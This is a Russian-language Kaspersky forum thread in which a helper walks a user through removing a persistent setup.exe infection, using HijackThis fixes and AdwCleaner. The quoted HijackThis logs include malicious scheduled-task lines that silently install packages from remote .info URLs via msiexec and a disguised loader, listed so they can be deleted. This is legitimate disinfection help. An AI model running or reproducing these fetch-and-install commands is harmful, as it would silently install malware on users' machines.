Перейти к содержанию
Правила раздела
19 лет клубу! Встречаемся в офисе «Лаборатории Касперского»

Постоянно создается файл setup в InstallShield

Logame

Автор Logame
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

Logame

Logame

Опубликовано
Опубликовано

Доброй ночи,возникла проблема с вирусом setup.exe который блочит антивирусы и не даёт себя удалить,после удаления постоянно восстанавливается. Расположен в C:\Windows\SysWOW64\InstallShield\x32 изза него постоянно зависает Браузер. Помогите с проблемой!

Ссылка на комментарий
Поделиться на другие сайты
regist

regist

Опубликовано
Опубликовано

"Пофиксите" в HijackThis:

O1 - Hosts: is damaged (contains NUL characters only)
O4 - MSConfig\startupfolder: C:^Users^Logame^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Shortcut to Primary output from Start (Active).lnk [backup] => (lnk is corrupted) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: DAEMON Tools Pro Agent [command] = C:\Program Files\DAEMON Tools Pro\DTAgent.exe -autorun (HKCU) (2018/04/24) (file missing)
O4 - MSConfig\startupreg: Discord [command] = C:\Users\Logame\AppData\Local\Discord\app-0.0.300\Discord.exe (HKCU) (2018/04/14) (file missing)
O4 - MSConfig\startupreg: DriverPack Cloud [command] = C:\Program Files (x86)\DriverPack Cloud\DriverPackCloud.exe --run startup (HKLM) (2018/04/12) (file missing)
O4 - MSConfig\startupreg: Gaijin.Net Agent [command] = C:\Users\Logame\AppData\Local\Gaijin\Program Files (x86)\NetAgent\gjagent.exe (HKCU) (2019/01/09) (file missing)
O4 - MSConfig\startupreg: MegaFon_MegaFonInternet [command] = C:\Program Files (x86)\MegaFon\MegaFon Internet\MegaFonInternet.exe /minimized (HKLM) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: Roox_YotaAccess_Modems [command] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (HKLM) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: Scartel_YotaAccess_Modems [command] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (HKLM) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: YoutubeDownloader [command] = C:\Users\Logame\AppData\Roaming\YoutubeDownloader\python\pythonw.exe "start.pyc" ml3 (HKCU) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: YoutubeDownloader_upd [command] = C:\Users\Logame\AppData\Roaming\YoutubeDownloader_upd\python\pythonw.exe "start.pyc" ml3 (HKCU) (2019/01/21)
O4-32 - HKLM\..\Run: [Roox_YotaAccess_Modems] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (file missing)
O22 - Task: BlueStacksHelper - C:\Logame\Programm\Новая папка\BlueStacks\Client\Helper\BlueStacksHelper.exe (file missing)
O22 - Task: \Microsoft\Windows\Services\WindowsUpdate32 - C:\Windows\srv_ext.exe --run (file missing)
O22 - Task: \Microsoft\Windows\WindowsBackup\WindowsBackupTask - C:\Windows\winmain64.exe --run --sh (file missing)
O22 - Task: {5008EF5A-9901-78AF-86FF-C6A75151CCC4} - C:\Windows\system32\msiexec.exe /package https://refreshnerer711.info/5b8Y14adu7Z.s1L -q
O22 - Task: {B46739DC-95A0-0F69-3A7F-DE9C89BB2D6E} - C:\Windows\SysWOW64\loAN.exe /q -package https://refreshnerer711rb.info/vIQBca2OuvKV.0S4

 

 

сделайте свежие логи из обычного режима.


+

  • Скачайте AdwCleaner и сохраните его на Рабочем столе.
  • Запустите его через правую кн. мыши от имени администратора, нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[s00].txt.
  • Прикрепите отчет к своему следующему сообщению.



 

Ссылка на комментарий
Поделиться на другие сайты
Logame

Logame

Опубликовано
  • Автор
Опубликовано

"Пофиксите" в HijackThis:

O1 - Hosts: is damaged (contains NUL characters only)
O4 - MSConfig\startupfolder: C:^Users^Logame^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Shortcut to Primary output from Start (Active).lnk [backup] => (lnk is corrupted) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: DAEMON Tools Pro Agent [command] = C:\Program Files\DAEMON Tools Pro\DTAgent.exe -autorun (HKCU) (2018/04/24) (file missing)
O4 - MSConfig\startupreg: Discord [command] = C:\Users\Logame\AppData\Local\Discord\app-0.0.300\Discord.exe (HKCU) (2018/04/14) (file missing)
O4 - MSConfig\startupreg: DriverPack Cloud [command] = C:\Program Files (x86)\DriverPack Cloud\DriverPackCloud.exe --run startup (HKLM) (2018/04/12) (file missing)
O4 - MSConfig\startupreg: Gaijin.Net Agent [command] = C:\Users\Logame\AppData\Local\Gaijin\Program Files (x86)\NetAgent\gjagent.exe (HKCU) (2019/01/09) (file missing)
O4 - MSConfig\startupreg: MegaFon_MegaFonInternet [command] = C:\Program Files (x86)\MegaFon\MegaFon Internet\MegaFonInternet.exe /minimized (HKLM) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: Roox_YotaAccess_Modems [command] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (HKLM) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: Scartel_YotaAccess_Modems [command] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (HKLM) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: YoutubeDownloader [command] = C:\Users\Logame\AppData\Roaming\YoutubeDownloader\python\pythonw.exe "start.pyc" ml3 (HKCU) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: YoutubeDownloader_upd [command] = C:\Users\Logame\AppData\Roaming\YoutubeDownloader_upd\python\pythonw.exe "start.pyc" ml3 (HKCU) (2019/01/21)
O4-32 - HKLM\..\Run: [Roox_YotaAccess_Modems] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (file missing)
O22 - Task: BlueStacksHelper - C:\Logame\Programm\Новая папка\BlueStacks\Client\Helper\BlueStacksHelper.exe (file missing)
O22 - Task: \Microsoft\Windows\Services\WindowsUpdate32 - C:\Windows\srv_ext.exe --run (file missing)
O22 - Task: \Microsoft\Windows\WindowsBackup\WindowsBackupTask - C:\Windows\winmain64.exe --run --sh (file missing)
O22 - Task: {5008EF5A-9901-78AF-86FF-C6A75151CCC4} - C:\Windows\system32\msiexec.exe /package https://refreshnerer711.info/5b8Y14adu7Z.s1L -q
O22 - Task: {B46739DC-95A0-0F69-3A7F-DE9C89BB2D6E} - C:\Windows\SysWOW64\loAN.exe /q -package https://refreshnerer711rb.info/vIQBca2OuvKV.0S4

сделайте свежие логи из обычного режима.

+

 

  • Скачайте AdwCleaner и сохраните его на Рабочем столе.
  • Запустите его через правую кн. мыши от имени администратора, нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[s00].txt.
  • Прикрепите отчет к своему следующему сообщению.

 

 

 

CollectionLog-2019.02.03-20.45.zip

AdwCleanerS02.txt

Ссылка на комментарий
Поделиться на другие сайты
regist

regist

Опубликовано
Опубликовано (изменено)

1) Не надо заниматься оверковтингом.

2) деинсталируйте

HitmanPro 3.8 [20180513]-->"C:\Program Files\HitmanPro\HitmanPro.exe" /uninstall
3) Удалите остатки avast.

4) "Пофиксите" в HijackThis:

O4 - MSConfig\startupfolder: C:^Users^Logame^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Shortcut to Primary output from Start (Active).lnk [backup] => (lnk is corrupted) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: DAEMON Tools Pro Agent [command] = C:\Program Files\DAEMON Tools Pro\DTAgent.exe -autorun (HKCU) (2018/04/24) (file missing)
O4 - MSConfig\startupreg: MegaFon_MegaFonInternet [command] = C:\Program Files (x86)\MegaFon\MegaFon Internet\MegaFonInternet.exe /minimized (HKLM) (2019/01/21) (file missing)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
5) Проверьте этот файл на virustotal

C:\Windows\srv_ext.exe
кнопка Выбрать файл (Choose File) - ищете нужный файл у вас в системе - Открыть (Browse) - Проверить (Scan it!). Нажать на кнопку Повторить анализ (Reanalyse) если будет. Дождитесь результата . Ссылку на результат (то, что будет в адресной строке в браузере) копируете и выкладываете в теме.

 

6)

  • Запустите повторно AdwCleaner (by Malwarebytes) (программу необходимо запускать через правую кн. мыши от имени администратора).
  • В меню Настройки включите дополнительно в разделе Базовые действия:
    • Сбросить политики IE
    • Сбросить политики Chrome
  • В меню Панель управления нажмите Сканировать.
  • По окончании нажмите кнопку Очистить и восстановить и дождитесь окончания удаления.
  • Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt (где x - любая цифра).
  • Прикрепите отчет к своему следующему сообщению
Внимание: Для успешного удаления нужна перезагрузка компьютера!!!.

 

Подробнее читайте в этом руководстве.

Изменено пользователем Sandor
Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • KitKat
      [РЕШЕНО] Постоянно возвращается MEM:Trojan.Win32.SEPEH.gen
      Автор KitKat
      CollectionLog-2025.06.29-18.57.zip
      Снова и снова возвращается вирус MEM:Trojan.Win32.SEPEH.gen . При работе с одной программой антивирус Касперский начинает сигнализировать об активности вируса. Удаляет. Некоторое время тихо, Потом опять возвращается. С середины мая воюю. Утилита доктора Вэба вообще ничего не находит. 
    • Quattro
      При каждой загрузке системы постоянно загружается фейковый AdBlock
      Автор Quattro
      Поймал откуда то фейковый Adblock, он установился во все браузеры. Самостоятельно удалил все расширения, вроде кое как почистил реестр, удалил из планировщика заданий, проверил несколькими программами и бестолку. Все равно при каждом запуске системы создаются вот такие файлы как на скрине. Каждый раз разное название, лежат одинаково в одном и том же месте для каждого браузера. Пользователи - Юзернейм - Appdata - Local - yandex - Default - extensions. Помогите удалить, уже всю голову изломал себе

      CollectionLog-2025.07.24-20.21.zip
    • Andrei93
      the application needs to be restored. run the setup wizard to restore
      Автор Andrei93
      Здравствуйте. У одного пользователя ошибка(Скрин)
       
      KES 12.3.0.493
       
      - Переустановка не помогает.
       
      Что можно придумать или какие логи могут помочь ?

    • gexxxagon
      Ошибка 0xc000017 постоянно выходит
      Автор gexxxagon
      При любой работе с пк (при работе с дисками, некоторыми командами в строке и тд) выходит эта ошибка.
      В Dr.Web CureIt чисто, все что было исправлено.
      Вручную через регистр пытались исправить некоторые ошибки, что-то исправилось, а что-то нет.
       
      Предполагаю, что возникло после установки обхода ограничений ютуба и дискорда, как многие говорят.
       
      Прилагаю файл, который обычно просят.
      FRST.txt
    • KL FC Bot
      Как создать надежный и запоминающийся пароль | Блог Касперского
      Автор KL FC Bot
      Информационный поток с каждым днем не уменьшается, и в 2025 году в нашей голове остается все меньше места для таких вещей, как пароль к той самой почте, которую вы завели в далеком 2020, чтобы зарегистрировать маму на маркетплейсе. Во Всемирный день пароля, выпадающий в этом году на 1 мая, День труда, предлагаем потрудиться и объединиться в борьбе против забывчивости, слабых паролей и хакеров.
      Как уже не раз подтверждали наши эксперты, целевая компрометация пароля — лишь вопрос времени и средств, причем зачастую — очень короткого времени и копеечных средств. И наша задача — максимально усложнить этот процесс, напрочь отбив желание у взломщиков заниматься именно вашими данными.
      В прошлогоднем исследовании мы выяснили, что 59% всех паролей мира могут быть взломаны менее чем за час при помощи умных алгоритмов, требующих мощной видеокарты вроде RTX 4090 или дешевой аренды облачных вычислительных мощностей. Сейчас мы проводим второй этап исследования и скоро расскажем, изменилась ли ситуация за год к лучшему или нет, так что подписывайтесь на наш блог или телеграм-канал, чтобы первыми узнать о результатах.
      Сегодня мы не просто расскажем о наиболее безопасных методах аутентификации и способах создания сложных паролей, но и обсудим техники их запоминания, а также ответим на вопрос, почему использовать менеджер паролей в 2025 году — действительно хорошая идея.
      Как безопаснее логиниться в 2025 году
      Сейчас у нас достаточно вариантов, с помощью которых можно проходить аутентификацию в сервисах и на веб-сайтах:
      классическая связка логин-пароль; аутентификация с помощью стороннего сервиса (VK, Яндекс, Apple, Google и т. д.); двухфакторная аутентификация с подтверждением: через SMS с одноразовым кодом; через приложение-аутентификатор (например, Kaspersky Password Manager, Google Authenticator или Microsoft Authenticator); с применением аппаратного ключа (например, Flipper, YubiKey или USB-токена); использование passkey и биометрической аутентификации. Разумеется, каждый из этих способов можно как усилить, например создать сложный пароль из 20+ случайных символов, так и ослабить, допустим, оставляя токен в USB-порту, а сам компьютер — без присмотра в публичных местах. И потому время «классических» паролей еще не прошло. Поэтому давайте разбираться, как мы можем усилить наши текущие позиции: придумать и запомнить незабываемый пароль.
       
      View the full article
×
×
  • Создать...